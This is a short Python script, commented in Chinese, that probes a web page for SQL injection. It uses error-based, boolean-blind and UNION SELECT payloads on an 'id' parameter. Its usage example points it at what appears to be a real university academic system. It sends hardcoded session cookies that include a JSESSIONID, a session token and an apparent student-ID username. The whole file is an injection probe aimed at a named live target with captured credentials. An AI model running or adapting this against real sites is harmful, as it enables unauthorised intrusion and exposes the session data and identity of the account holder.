import requests
cookies = {
    "sl-session": "fFG7JF38Lmi4Y7BesknzTA==",
    "Hm_lvt_da1a662b816ecaf953251c774dc1fb07": "1747823326",
    "HMACCOUNT": "B07105B54D0E7153",
    "username": "231123110374",
    "JSESSIONID": "7211B28B64A7980D21B8F2CBDCA0CCCB",
    "Hm_lpvt_da1a662b816ecaf953251c774dc1fb07": "1747834410"
}
def detect_sqli(url):
    # 第一阶段：检测错误回显
    error_payload = "1'"
    r_error = requests.get(url, params={"id": error_payload},cookies=cookies)

    if "You have an error in your SQL syntax" in r_error.text:
        print("[+] 漏洞确认：错误回显存在")
        return True

    # 第二阶段：布尔盲注验证
    true_payload = "1' AND 1=1--+"
    false_payload = "1' AND 1=2--+"

    try:
        true_res = requests.get(url, params={"id": true_payload},cookies=cookies).text
        false_res = requests.get(url, params={"id": false_payload},cookies=cookies).text

        if true_res != false_res:
            print("[+] 漏洞确认：布尔条件响应差异")
            return True
    except Exception as e:
        print("[-] 请求失败:", str(e))

    # 第三阶段：联合查询验证
    union_payload = "1' UNION SELECT 1,2,3--+"
    try:
        union_res = requests.get(url, params={"id": union_payload}, cookies=cookies).text
        if "2" in union_res and "3" in union_res:
            print("[+] 漏洞确认：联合查询成功")
            return True
    except:
        pass

    print("[-] 未检测到SQL注入漏洞")
    return False


# 使用示例
target_url = "https://jw.guc.edu.cn/yethan/UserFramework/"
detect_sqli(target_url)